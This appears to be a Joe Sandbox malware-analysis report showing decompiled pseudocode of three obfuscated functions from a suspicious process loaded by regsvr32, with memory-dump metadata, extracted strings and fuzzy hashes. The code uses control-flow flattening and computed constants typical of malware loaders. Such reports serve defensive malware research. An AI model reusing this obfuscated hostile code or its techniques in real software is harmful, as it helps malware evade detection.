				signed int _v1592;
				signed int _v1596;
				void* _t238;
				short* _t242;
				void* _t249;
				signed int _t261;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t281;
				signed int _t284;
				signed int* _t306;

				_t271 = __ecx;
				_t306 =  &_v1596;
				_v1576 = 0x334a5;
				_t270 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t238 = 0xd3e83;
				do {
					while(_t238 != 0x8381b) {
						if(_t238 == 0xbbd25) {
							_v1592 = 0xc46381;
							_t284 = 0x52;
							_v1592 = _v1592 * 0x78;
							_v1592 = _v1592 ^ 0x5c066b0a;
							_v1596 = 0x4cd7f1;
							_v1596 = _v1596 * 0x42;
							_v1596 = _v1596 * 0x5c;
							_v1596 = _v1596 >> 6;
							_v1596 = _v1596 ^ 0x007964ea;
							_v1580 = 0xffa860;
							_v1580 = _v1580 >> 0xd;
							_v1580 = _v1580 ^ 0x00059cd4;
							_v1584 = 0x9d6407;
							_v1584 = _v1584 ^ 0x70127c12;
							_v1584 = _v1584 >> 7;
							_v1584 = _v1584 ^ 0x00ebfa72;
							_v1588 = 0x44189d;
							_v1588 = _v1588 / _t284;
							_v1588 = _v1588 * 0x7d;
							_t230 =  &_v1588;
							 *_t230 = _v1588 ^ 0x00677084;
							__eflags =  *_t230;
							return E04F73B17(_v1592,  &_v1040,  *_t230, _v1596, _t284, _v1580, 0, _v1584, 0, 0, _v1588);
						}
						if(_t238 != 0xd3e83) {
							goto L7;
						} else {
							_t238 = 0x8381b;
							continue;
						}
						L10:
						return _t261;
					}
					_v1588 = 0xca3976;
					_v1588 = _v1588 >> 2;
					_v1588 = _v1588 ^ 0x0031ab33;
					_v1596 = 0x7d2f25;
					_v1596 = _v1596 ^ 0x96e54afa;
					_v1596 = _v1596 ^ 0x357c881c;
					_v1596 = _v1596 ^ 0xa3e92d32;
					_push(_t271);
					E04F75B9E(_v1588,  &_v1560, __eflags, _v1596);
					_v1584 = 0x8d87c5;
					_t273 = 6;
					_v1584 = _v1584 / _t273;
					_v1584 = _v1584 ^ 0x00120909;
					_v1588 = 0xf996d6;
					_v1588 = _v1588 >> 4;
					_v1588 = _v1588 ^ 0x0002986f;
					_t242 = E04F73E30(_v1584,  &_v1560, _v1588);
					_push(0x5c);
					 *_t242 = 0;
					_v1596 = 0x44dc5d;
					_v1596 = _v1596 / 0;
					_v1596 = _v1596 ^ 0xb755a695;
					_v1596 = _v1596 << 4;
					_v1596 = _v1596 ^ 0x75579c6f;
					_v1592 = 0xb8c659;
					_v1592 = _v1592 << 6;
					_v1592 = _v1592 ^ 0x8cf65aba;
					_v1592 = _v1592 + 0xffff7603;
					_v1592 = _v1592 ^ 0xa2cd0aeb;
					E04F619C8(_v1596, _v1592, __eflags,  &_v520);
					_v1596 = 0x487eb4;
					_v1596 = _v1596 + 0x52c1;
					_v1596 = _v1596 ^ 0x72aba53a;
					_v1596 = _v1596 >> 0xa;
					_v1596 = _v1596 ^ 0x001e5cf6;
					_v1592 = 0x2b50f6;
					_v1592 = _v1592 + 0x4108;
					_v1592 = _v1592 * 0x4d;
					_v1592 = _v1592 ^ 0x0d17e8d9;
					_v1584 = 0x158666;
					_v1584 = _v1584 * 0x2c;
					_v1584 = _v1584 ^ 0x03b98735;
					_v1588 = 0x49efd0;
					_v1588 = _v1588 | 0x187b114b;
					_v1588 = _v1588 ^ 0x187d59f7;
					_t249 = E04F7D6A7(_v1596, _v1592, _v1584, 0x4f6184c, _v1588);
					_v1588 = 0xdad1b0;
					_v1588 = _v1588 << 7;
					_v1588 = _v1588 * 0x3f;
					_v1588 = _v1588 ^ 0xeccb8348;
					_v1584 = 0x88eb8a;
					_v1584 = _v1584 * 0x3e;
					_v1584 = _v1584 << 0x10;
					_v1584 = _v1584 ^ 0x0b60a089;
					_v1592 = 0x53547c;
					_v1592 = _v1592 | 0x5723742f;
					_v1592 = _v1592 ^ 0x6798eeb6;
					_t281 = 0x78;
					_v1592 = _v1592 / _t281;
					_v1592 = _v1592 ^ 0x00627ae1;
					_v1580 = 0x1aa22b;
					_v1580 = _v1580 * 0x2f;
					_v1580 = _v1580 ^ 0x04eb50e2;
					_v1596 = 0x367eb3;
					_v1596 = _v1596 >> 9;
					_v1596 = _v1596 | 0x95de39c1;
					_v1596 = _v1596 << 0xb;
					_v1596 = _v1596 ^ 0xf1ded797;
					E04F736BB( &_v1560, __eflags, _t281, _v1584,  &_v520, _v1592, _v1580, _t249, _v1596,  &_v1040);
					_v1592 = 0x49ab4f;
					_v1592 = _v1592 ^ 0xd9fc3278;
					_v1592 = _v1592 ^ 0x9e9bd696;
					_v1592 = _v1592 * 0x65;
					_v1592 = _v1592 ^ 0x1541344b;
					_v1596 = 0xddf86f;
					_v1596 = _v1596 + 0xffffedf3;
					_v1596 = _v1596 << 0xa;
					_v1596 = _v1596 + 0x67dd;
					_v1596 = _v1596 ^ 0x77923244;
					_v1580 = 0x45716d;
					_v1580 = _v1580 ^ 0x7f8da3c9;
					_v1580 = _v1580 ^ 0x7fc4f79c;
					_v1588 = 0xc0963f;
					_v1588 = _v1588 + 0x1d1d;
					_v1588 = _v1588 | 0xeb05e9c3;
					_v1588 = _v1588 ^ 0xebc6adb9;
					E04F6845B(_v1592, _v1596, _v1580, _v1588, _t249);
					_v1592 = 0xecac69;
					_v1592 = _v1592 >> 3;
					_v1592 = _v1592 << 2;
					_v1592 = _v1592 * 0x5d;
					_v1592 = _v1592 ^ 0x2afb9b09;
					_v1596 = 0x86fbe1;
					_v1596 = _v1596 >> 0x10;
					_v1596 = _v1596 ^ 0x99dd4c7c;
					_v1596 = _v1596 * 0x37;
					_v1596 = _v1596 ^ 0x0e8e42d2;
					_t271 = _v1592;
					_t261 = E04F775AD(_t271, _v1596,  &_v1040, _t270);
					_t306 =  &(_t306[0x14]);
					__eflags = _t261;
					if(_t261 != 0) {
						_t238 = 0xbbd25;
						goto L7;
					}
					goto L10;
					L7:
					__eflags = _t238 - 0x9fc3d;
				} while (__eflags != 0);
				return _t238;
			}

0x04f6ced3
0x04f6ced3
0x04f6cedf
0x04f6ceeb
0x04f6ceed
0x04f6cef3
0x04f6cef4
0x04f6cef5
0x04f6ceff
0x04f6ceff
0x04f6cf05
0x04f6d294
0x04f6d2a5
0x04f6d2a6
0x04f6d2aa
0x04f6d2b2
0x04f6d2bf
0x04f6d2c8
0x04f6d2cc
0x04f6d2d1
0x04f6d2d9
0x04f6d2e1
0x04f6d2e6
0x04f6d2ee
0x04f6d2f6
0x04f6d2fe
0x04f6d303
0x04f6d30b
0x04f6d320
0x04f6d329
0x04f6d32f
0x04f6d32f
0x04f6d32f
0x00000000
0x04f6d354
0x04f6cf10
0x00000000
0x04f6cf16
0x04f6cf16
0x00000000
0x04f6cf16
0x04f6d361
0x04f6d361
0x04f6d361
0x04f6cf1a
0x04f6cf26
0x04f6cf2b
0x04f6cf33
0x04f6cf3b
0x04f6cf43
0x04f6cf4b
0x04f6cf53
0x04f6cf5c
0x04f6cf61
0x04f6cf71
0x04f6cf78
0x04f6cf7c
0x04f6cf84
0x04f6cf8c
0x04f6cf91
0x04f6cfa1
0x04f6cfaa
0x04f6cfac
0x04f6cfaf
0x04f6cfbe
0x04f6cfc9
0x04f6cfd1
0x04f6cfd6
0x04f6cfde
0x04f6cfe6
0x04f6cfeb
0x04f6cff3
0x04f6cffb
0x04f6d00c
0x04f6d011
0x04f6d019
0x04f6d021
0x04f6d029
0x04f6d02e
0x04f6d036
0x04f6d03e
0x04f6d04b
0x04f6d04f
0x04f6d057
0x04f6d064
0x04f6d068
0x04f6d070
0x04f6d078
0x04f6d080
0x04f6d09d
0x04f6d0a2
0x04f6d0ad
0x04f6d0b9
0x04f6d0bd
0x04f6d0c5
0x04f6d0d2
0x04f6d0d8
0x04f6d0dd
0x04f6d0e5
0x04f6d0ed
0x04f6d0f5
0x04f6d103
0x04f6d10a
0x04f6d10e
0x04f6d116
0x04f6d123
0x04f6d12e
0x04f6d136
0x04f6d13e
0x04f6d143
0x04f6d14b
0x04f6d150
0x04f6d177
0x04f6d17c
0x04f6d184
0x04f6d18c
0x04f6d19a
0x04f6d19e
0x04f6d1a6
0x04f6d1ae
0x04f6d1b6
0x04f6d1bb
0x04f6d1c3
0x04f6d1cb
0x04f6d1d3
0x04f6d1db
0x04f6d1e3
0x04f6d1eb
0x04f6d1f3
0x04f6d1fb
0x04f6d213
0x04f6d218
0x04f6d220
0x04f6d225
0x04f6d230
0x04f6d234
0x04f6d23c
0x04f6d244
0x04f6d249
0x04f6d256
0x04f6d261
0x04f6d26d
0x04f6d272
0x04f6d277
0x04f6d27a
0x04f6d27c
0x04f6d282
0x00000000
0x04f6d282
0x00000000
0x04f6d284
0x04f6d284
0x04f6d284
0x00000000

Strings

zb, xrefs: 04F6D10E
/t#W, xrefs: 04F6D0ED
mqE, xrefs: 04F6D1CB
dy, xrefs: 04F6D2D1

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /t#W$mqE$dy$zb
API String ID: 0-60181749
Opcode ID: 357b57cec9fe1cb498f916ca0bec941ced1b62a0848122196288d28bdbaa9caa
Instruction ID: 6d38db1a6a70f2ce516310ccdcc8fd486f85af664384b119435e0e6e2019052b
Opcode Fuzzy Hash: 357b57cec9fe1cb498f916ca0bec941ced1b62a0848122196288d28bdbaa9caa
Instruction Fuzzy Hash: 07C1DE715093819FD348DF21D58A80BBBF5BBC8748F109E1DF59AA6220D3B5DA09CF86

Uniqueness

Uniqueness Score: -1.00%

Function 04F74093 Relevance: 5.2, Strings: 4, Instructions: 233
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04F74093(void* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, intOrPtr _a12) {
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				void* _t184;
				void* _t186;
				signed int _t208;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int* _t241;
				signed int* _t245;
				void* _t247;

				_t242 = _a4;
				_push(_a12);
				_t241 = _a8;
				_push(_t241);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t184);
				_v40 = 0x476f9;
				_t245 =  &(( &_v44)[5]);
				_t186 = 0x67f3f;
				_v36 = 0x32241;
				goto L1;
				do {
					while(1) {
						L1:
						_t247 = _t186 - 0x8bc46;
						if(_t247 > 0) {
							break;
						}
						if(_t247 == 0) {
							_v40 = 0xdfc6b9;
							_v40 = _v40 >> 6;
							_v40 = _v40 ^ 0x000da5a4;
							_a8 = 0x797fc3;
							_a8 = _a8 ^ 0x2e796e7d;
							_t91 =  &_a8; // 0x2e796e7d
							_a8 =  *_t91 * 0x5b;
							_a8 = _a8 ^ 0x5a015daf;
							_t224 = _v40;
							E04F6591D(_t224,  &_v32,  *((intOrPtr*)(_t242 + 0x18)), _a8);
							_t245 =  &(_t245[2]);
							_t186 = 0xae1bb;
							continue;
						} else {
							if(_t186 == 0x13d97) {
								_v44 = 0x8d3b81;
								_v44 = _v44 + 0x4377;
								_v44 = _v44 | 0x7725109c;
								_v44 = _v44 ^ 0x77ab8453;
								_a8 = 0x4400de;
								_a8 = _a8 << 4;
								_a8 = _a8 * 3;
								_a8 = _a8 + 0xffff7db9;
								_a8 = _a8 ^ 0x0cb7d63b;
								_t208 = E04F73EE6(_t224, _t241[1], __eflags);
								 *_t241 = _t208;
								_t224 = _t224;
								__eflags = _t208;
								if(__eflags != 0) {
									_t186 = 0x32b98;
									continue;
								}
							} else {
								if(_t186 == 0x2b3df) {
									_v44 = 0x8bb936;
									_v44 = _v44 + 0xffff21b3;
									_v44 = _v44 | 0x1e4df25b;
									_v44 = _v44 << 0x10;
									_v44 = _v44 ^ 0xfaff1cac;
									_a8 = 0x7242fa;
									_a8 = _a8 >> 9;
									_a8 = _a8 + 0xffff8d0a;
									_a8 = _a8 * 0x16;
									_a8 = _a8 ^ 0xfff9dd1a;
									_t224 = _v44;
									E04F6591D(_t224,  &_v32,  *((intOrPtr*)(_t242 + 0x28)), _a8);
									_t245 =  &(_t245[2]);
									_t186 = 0xf8610;
									continue;
								} else {
									if(_t186 == 0x32b98) {
										_v40 = 0xd8c3a8;
										_v40 = _v40 * 0x62;
										_v40 = _v40 ^ 0x52f86807;
										_a8 = 0x891b12;
										_a8 = _a8 ^ 0x008b0615;
										E04F80484(_v40, _t241,  &_v32, _a8);
										_pop(_t224);
										_t186 = 0x6a37b;
										continue;
									} else {
										if(_t186 == 0x67f3f) {
											 *_t241 =  *_t241 & 0x00000000;
											_t186 = 0xb18b4;
											_t241[1] = _t241[1] & 0x00000000;
											continue;
										} else {
											_t252 = _t186 - 0x6a37b;
											if(_t186 != 0x6a37b) {
												goto L24;
											} else {
												_v40 = 0xe1af57;
												_v40 = _v40 | 0x62e5db32;
												_v40 = _v40 ^ 0x62eb2219;
												_v44 = 0x626548;
												_v44 = _v44 + 0xfffff828;
												_v44 = _v44 ^ 0x0069e985;
												_a8 = 0xe50841;
												_a8 = _a8 | 0x57f77aee;
												_a8 = _a8 ^ 0x57ff7beb;
												_t224 = _v40;
												E04F7FB8E(_t224, _v44, _t252, _a8,  &_v32, _t242 + 0x3c);
												_t245 =  &(_t245[3]);
												_t186 = 0x2b3df;
												continue;
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t241;
						_t183 =  *_t241 != 0;
						__eflags = _t183;
						return 0 | _t183;
					}
					__eflags = _t186 - 0x9bafb;
					if(_t186 == 0x9bafb) {
						_a8 = 0x14d640;
						_a8 = _a8 >> 2;
						_a8 = _a8 >> 6;
						_a8 = _a8 ^ 0x00043bdb;
						_v40 = 0xfdd657;
						_v40 = _v40 | 0x82b84cc7;
						_t154 =  &_v40;
						 *_t154 = _v40 ^ 0x82f5feb7;
						__eflags =  *_t154;
						E04F6591D(_a8,  &_v32,  *_t242, _v40);
						_t245 =  &(_t245[2]);
						_t186 = 0xfa8db;
						goto L24;
					} else {
						__eflags = _t186 - 0xae1bb;
						if(_t186 == 0xae1bb) {
							_a8 = 0xf9e6c5;
							_a8 = _a8 | 0x9609879f;
							_a8 = _a8 + 0x7e19;
							_a8 = _a8 ^ 0x1e4edec4;
							_a8 = _a8 ^ 0x88b85a58;
							_v44 = 0x9d410a;
							_v44 = _v44 >> 6;
							_v44 = _v44 ^ 0x0001b7f5;
							_v40 = 0x728ab3;
							_v40 = _v40 * 0x6a;
							_t176 =  &_v40;
							 *_t176 = _v40 ^ 0x2f62306d;
							__eflags =  *_t176;
							E04F7FB8E(_a8, _v44,  *_t176, _v40,  &_v32, _t242 + 8);
						} else {
							__eflags = _t186 - 0xb18b4;
							if(_t186 == 0xb18b4) {
								_t241[1] = E04F6D5D6(_t242);
								_t186 = 0x13d97;
								goto L1;
							} else {
								__eflags = _t186 - 0xf8610;
								if(_t186 == 0xf8610) {
									_a8 = 0x7e3f56;
									_t117 =  &_a8; // 0x7e3f56
									_t222 = 0x2e;
									_a8 =  *_t117 / _t222;
									_t223 = 0x3b;
									_a8 = _a8 * 0x51;
									_t125 =  &_a8; // 0x7e3f56
									_a8 =  *_t125 * 0x1c;
									_a8 = _a8 ^ 0x185ab602;
									_v40 = 0x61459;
									_v40 = _v40 / _t223;
									_v40 = _v40 ^ 0x00017779;
									_t224 = _a8;
									E04F6591D(_t224,  &_v32,  *((intOrPtr*)(_t242 + 0x30)), _v40);
									_t245 =  &(_t245[2]);
									_t186 = 0x9bafb;
									goto L1;
								} else {
									__eflags = _t186 - 0xfa8db;
									if(_t186 != 0xfa8db) {
										goto L24;
									} else {
										_v44 = 0x181a1f;
										_v44 = _v44 + 0xffff4238;
										_v44 = _v44 + 0xffff7af6;
										_v44 = _v44 ^ 0x0014dd8e;
										_a8 = 0xd061fb;
										_a8 = _a8 ^ 0x66e56407;
										_a8 = _a8 + 0x2ae1;
										_a8 = _a8 ^ 0x663d0273;
										_t224 = _v44;
										E04F6591D(_t224,  &_v32,  *((intOrPtr*)(_t242 + 0x34)), _a8);
										_t245 =  &(_t245[2]);
										_t186 = 0x8bc46;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t186 - 0x37514;
				} while (__eflags != 0);
				goto L27;
			}

0x04f74098
0x04f7409d
0x04f740a1
0x04f740a5
0x04f740a6
0x04f740a7
0x04f740a8
0x04f740a9
0x04f740ae
0x04f740b6
0x04f740b9
0x04f740be
0x04f740c6
0x04f740cb
0x04f740cb
0x04f740cb
0x04f740cb
0x04f740cd
0x00000000
0x00000000
0x04f740d3
0x04f742b5
0x04f742c1
0x04f742c6
0x04f742ce
0x04f742d6
0x04f742de
0x04f742e3
0x04f742e7
0x04f742f3
0x04f742fa
0x04f742ff
0x04f74302
0x00000000
0x04f740d9
0x04f740de
0x04f74249
0x04f74251
0x04f74259
0x04f74261
0x04f74269
0x04f74271
0x04f7427c
0x04f74280
0x04f74288
0x04f7429b
0x04f742a0
0x04f742a2
0x04f742a3
0x04f742a5
0x04f742ab
0x00000000
0x04f742ab
0x04f740e4
0x04f740e9
0x04f741dd
0x04f741e9
0x04f741f1
0x04f741f9
0x04f741fe
0x04f74206
0x04f7420e
0x04f74213
0x04f74220
0x04f74224
0x04f74230
0x04f74237
0x04f7423c
0x04f7423f
0x00000000
0x04f740ef
0x04f740f4
0x04f7418c
0x04f7419b
0x04f7419f
0x04f741a7
0x04f741bb
0x04f741cc
0x04f741d2
0x04f741d3
0x00000000
0x04f740fa
0x04f740ff
0x04f7417b
0x04f7417e
0x04f74183
0x00000000
0x04f74101
0x04f74101
0x04f74106
0x00000000
0x04f7410c
0x04f7410c
0x04f74117
0x04f7411f
0x04f74127
0x04f7412f
0x04f74137
0x04f7413f
0x04f74147
0x04f7414f
0x04f74165
0x04f74169
0x04f7416e
0x04f74171
0x00000000
0x04f74171
0x04f74106
0x04f740ff
0x04f740f4
0x04f740e9
0x04f740de
0x04f744ef
0x04f744f1
0x04f744f5
0x04f744f5
0x04f744fc
0x04f744fc
0x04f7430c
0x04f74311
0x04f74422
0x04f7442e
0x04f74433
0x04f74438
0x04f74440
0x04f74448
0x04f74450
0x04f74450
0x04f74450
0x04f74462
0x04f74467
0x04f7446a
0x00000000
0x04f74317
0x04f74317
0x04f7431c
0x04f7447c
0x04f74484
0x04f7448c
0x04f74494
0x04f7449c
0x04f744a4
0x04f744ac
0x04f744b1
0x04f744b9
0x04f744c6
0x04f744cd
0x04f744cd
0x04f744cd
0x04f744e7
0x04f74322
0x04f74322
0x04f74327
0x04f74415
0x04f74418
0x00000000
0x04f7432d
0x04f7432d
0x04f74332
0x04f7439d
0x04f743a7
0x04f743ad
0x04f743b2
0x04f743bd
0x04f743be
0x04f743c2
0x04f743c7
0x04f743cb
0x04f743d3
0x04f743e5
0x04f743e9
0x04f743f5
0x04f743fc
0x04f74401
0x04f74404
0x00000000
0x04f74334
0x04f74334
0x04f74339
0x00000000
0x04f7433f
0x04f7433f
0x04f7434b
0x04f74353
0x04f7435b
0x04f74363
0x04f7436b
0x04f74373
0x04f7437b
0x04f74387
0x04f7438e
0x04f74393
0x04f74396
0x00000000
0x04f74396
0x04f74339
0x04f74332
0x04f74327
0x04f7431c
0x00000000
0x04f7446f
0x04f7446f
0x04f7446f
0x00000000

Strings

wC, xrefs: 04F74251
m0b/, xrefs: 04F744CD
Heb, xrefs: 04F74127
}ny., xrefs: 04F742DE

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Heb$m0b/$wC$}ny.
API String ID: 0-3634310846
Opcode ID: c9b1dc0fe909539af217a37ca4aa2a8e965fad45eb883bfb5700577a1dc1afed
Instruction ID: 72970aea14f19d3530f8cb4eaadf7523bfc0679fcf51709835ab015d6a92dcd3
Opcode Fuzzy Hash: c9b1dc0fe909539af217a37ca4aa2a8e965fad45eb883bfb5700577a1dc1afed
Instruction Fuzzy Hash: 2DB1E3715083819BC724DF24D54945BBBF1FB95314F008E2EF69686260E3BAE91ADF43

Uniqueness

Uniqueness Score: -1.00%

Function 04F691D6 Relevance: 5.2, Strings: 4, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04F691D6(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _t176;
				signed int _t185;
				signed int _t199;
				intOrPtr _t200;
				signed int _t201;
				intOrPtr _t207;
				signed int _t209;
				signed int _t212;
				intOrPtr _t221;
				signed int _t229;
				signed int _t230;
				intOrPtr _t231;
				signed int _t233;
				intOrPtr _t234;
				signed int _t235;
				intOrPtr _t236;
				unsigned int* _t237;

				_t200 = __ecx;
				_t237 =  &_v52;
				_t230 = _v16;
				_v20 = __edx;
				_t176 = 0x316f3;
				_t199 = _v20;
				_v12 = 0xfa17d;
				_t229 = _v20;
				_v8 = 0xe30eb;
				_v36 = 0;
				_t233 = _v20;
				_v40 = __ecx;
				_v4 = 0x42f8a;
				L1:
				while(1) {
					do {
						while(_t176 != 0x303d7) {
							if(_t176 == 0x316f3) {
								_t176 = 0x303d7;
								continue;
							} else {
								if(_t176 != 0xc51a4) {
									goto L14;
								} else {
									_v48 = 0xec6faa;
									_v48 = _v48 * 0x37;
									_v48 = _v48 | 0xdfaac10a;
									_v48 = _v48 ^ 0xffe92620;
									_v44 = 0x49e987;
									_v44 = _v44 >> 0xe;
									_v44 = _v44 ^ 0x00014eb5;
									_v52 = 0x6ad37c;
									_v52 = _v52 << 0xe;
									_v52 = _v52 * 0x71;
									_v52 = _v52 + 0x46e1;
									_v52 = _v52 ^ 0xd66501aa;
									_t221 = E04F6F766(_v48, _t200,  &_v32, _v44, _v52, _t233, _t229);
									_t237 =  &(_t237[5]);
									_v36 = _t221;
									if(_t221 == 0) {
										_t234 = _v36;
										L19:
										_v52 = 0x8b764d;
										_v52 = _v52 << 9;
										_v52 = _v52 << 0xc;
										_v52 = _v52 << 0xe;
										_v52 = _v52 ^ 0x000f2f83;
										_v48 = 0xc092b6;
										_v48 = _v48 + 0xffff78d6;
										_v48 = _v48 ^ 0x00ccaff2;
										_v44 = 0x942a5b;
										_v44 = _v44 << 8;
										_v44 = _v44 ^ 0x94201af0;
										E04F7E4B2(_v52, _v48, __eflags, _v44, _t199);
									} else {
										_t207 = _v32;
										if(_t207 == 0) {
											goto L15;
										} else {
											_t233 = _t233 + _t207;
											_t229 = _t229 - _t207;
											_t244 = _t229;
											if(_t229 != 0) {
												L9:
												_t200 = _v40;
												_t176 = 0xc51a4;
												continue;
											} else {
												_v52 = 0xb09cb7;
												_v52 = _v52 + 0x628f;
												_v52 = _v52 >> 0xa;
												_v52 = _v52 >> 0xe;
												_v52 = _v52 ^ 0x00000002;
												_v48 = 0xb0e004;
												_t235 = 3;
												_t209 = _v52 * _t230;
												_v48 = _v48 / _t235;
												_v48 = _v48 + 0x23db;
												_v48 = _v48 ^ 0x00392204;
												_v44 = 0x5a147;
												_v44 = _v44 + 0xffff4146;
												_v44 = _v44 ^ 0x000f7a38;
												_push(_t209);
												_v24 = _t209;
												_t236 = E04F73EE6(_t209, _t209, _t244);
												_v28 = _t236;
												_t245 = _t236;
												if(_t236 == 0) {
													goto L15;
												} else {
													_v44 = 0xb27d29;
													_v44 = _v44 >> 0xc;
													_v44 = _v44 ^ 0x00093697;
													_v52 = 0xa422b7;
													_v52 = _v52 * 0x21;
													_t212 = 0x47;
													_v52 = _v52 / _t212;
													_v52 = _v52 ^ 0x0048447e;
													_v48 = 0xd68d22;
													_v48 = _v48 << 4;
													_v48 = _v48 ^ 0x93f5cf27;
													_v48 = _v48 ^ 0x9e9c817c;
													E04F6C8F0(_t236, _v44, _v52, _t199, _t230, _v48);
													_v52 = 0xb46d79;
													_v52 = _v52 + 0xc6cd;
													_v52 = _v52 ^ 0xe3132a42;
													_v52 = _v52 + 0xffff4882;
													_v52 = _v52 ^ 0xe3a09896;
													_v48 = 0x989ba5;
													_v48 = _v48 << 1;
													_v48 = _v48 + 0x2985;
													_v48 = _v48 ^ 0x013355fd;
													_v44 = 0x79dfb2;
													_v44 = _v44 + 0xdf88;
													_v44 = _v44 ^ 0x0074e449;
													E04F7E4B2(_v52, _v48, _t245, _v44, _t199);
													_t199 = _v28;
													_t229 = _t230;
													_t233 = _t236 + _t230;
													_t237 =  &(_t237[6]);
													_t230 = _v24;
													if(_t229 == 0) {
														goto L15;
													} else {
														goto L9;
													}
												}
											}
										}
									}
								}
							}
							L17:
							return _t234;
						}
						_v44 = 0xf840e9;
						_v44 = _v44 + 0xffffb0d8;
						_v44 = _v44 ^ 0x00f6f1c1;
						_t230 = _v44;
						_v52 = 0x4cc9ec;
						_v52 = _v52 ^ 0x76fdff65;
						_v52 = _v52 >> 9;
						_v52 = _v52 >> 4;
						_v52 = _v52 ^ 0x00007a10;
						_v48 = 0xea0418;
						_t201 = 0x4b;
						_push(_t201);
						_v48 = _v48 * 0x12;
						_v48 = _v48 / _t201;
						_v48 = _v48 ^ 0x00363586;
						_t199 = E04F73EE6(_t201, _t230, __eflags);
						__eflags = _t199;
						if(__eflags == 0) {
							_t200 = _v40;
							_t176 = 0xfe8a;
							goto L14;
						} else {
							_t233 = _t199;
							_t229 = _t230;
							goto L9;
						}
						goto L17;
						L14:
						__eflags = _t176 - 0xfe8a;
					} while (__eflags != 0);
					L15:
					_t234 = _v36;
					__eflags = _t234;
					if(__eflags == 0) {
						goto L19;
					} else {
						_t185 = _v20;
						_t231 = _t230 - _t229;
						__eflags = _t231;
						 *_t185 = _t199;
						 *((intOrPtr*)(_t185 + 4)) = _t231;
					}
					goto L17;
				}
			}

0x04f691d6
0x04f691d6
0x04f691dc
0x04f691e2
0x04f691e6
0x04f691eb
0x04f691ef
0x04f691f8
0x04f691fc
0x04f69204
0x04f69208
0x04f6920c
0x04f69210
0x00000000
0x04f69218
0x04f69218
0x04f69218
0x04f69228
0x04f69460
0x00000000
0x04f6922e
0x04f69233
0x00000000
0x04f69239
0x04f69239
0x04f6924a
0x04f6924e
0x04f69256
0x04f6925e
0x04f69266
0x04f6926b
0x04f69273
0x04f6927b
0x04f69285
0x04f6928d
0x04f69295
0x04f692af
0x04f692b1
0x04f692b4
0x04f692ba
0x04f69521
0x04f69525
0x04f69525
0x04f6952d
0x04f69532
0x04f69537
0x04f6953c
0x04f69544
0x04f6954c
0x04f69554
0x04f6955c
0x04f69564
0x04f69569
0x04f6957e
0x04f692c0
0x04f692c0
0x04f692c6
0x00000000
0x04f692cc
0x04f692cc
0x04f692ce
0x04f692ce
0x04f692d0
0x04f69452
0x04f69452
0x04f69456
0x00000000
0x04f692d6
0x04f692d6
0x04f692e0
0x04f692e8
0x04f692ed
0x04f692f2
0x04f692fb
0x04f69309
0x04f6930c
0x04f6930f
0x04f69313
0x04f6931b
0x04f69323
0x04f6932b
0x04f69335
0x04f69345
0x04f69346
0x04f6934f
0x04f69351
0x04f69356
0x04f69358
0x00000000
0x04f6935e
0x04f6935e
0x04f69368
0x04f6936d
0x04f69375
0x04f69384
0x04f6938c
0x04f69391
0x04f69395
0x04f6939d
0x04f693a5
0x04f693aa
0x04f693b2
0x04f693c8
0x04f693cd
0x04f693d5
0x04f693dd
0x04f693e5
0x04f693ed
0x04f693f5
0x04f693fd
0x04f69401
0x04f69409
0x04f69411
0x04f69419
0x04f69421
0x04f69436
0x04f6943b
0x04f6943f
0x04f69441
0x04f69443
0x04f69446
0x04f6944c
0x00000000
0x00000000
0x00000000
0x00000000
0x04f6944c
0x04f69358
0x04f692d0
0x04f692c6
0x04f692ba
0x04f69233
0x04f69519
0x04f69520
0x04f69520
0x04f6946a
0x04f69474
0x04f6947c
0x04f69484
0x04f69488
0x04f69490
0x04f69498
0x04f6949d
0x04f694a2
0x04f694aa
0x04f694b9
0x04f694ba
0x04f694bb
0x04f694c7
0x04f694cb
0x04f694e0
0x04f694e3
0x04f694e5
0x04f694f0
0x04f694f4
0x00000000
0x04f694e7
0x04f694e7
0x04f694e9
0x00000000
0x04f694e9
0x00000000
0x04f694f9
0x04f694f9
0x04f694f9
0x04f69504
0x04f69504
0x04f69508
0x04f6950a
0x00000000
0x04f6950c
0x04f6950c
0x04f69510
0x04f69510
0x04f69512
0x04f69514
0x04f69514
0x00000000
0x04f6950a

Strings

~DH, xrefs: 04F69395
F, xrefs: 04F6928D
It, xrefs: 04F69421
~DH, xrefs: 04F6937D, 04F692F7

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

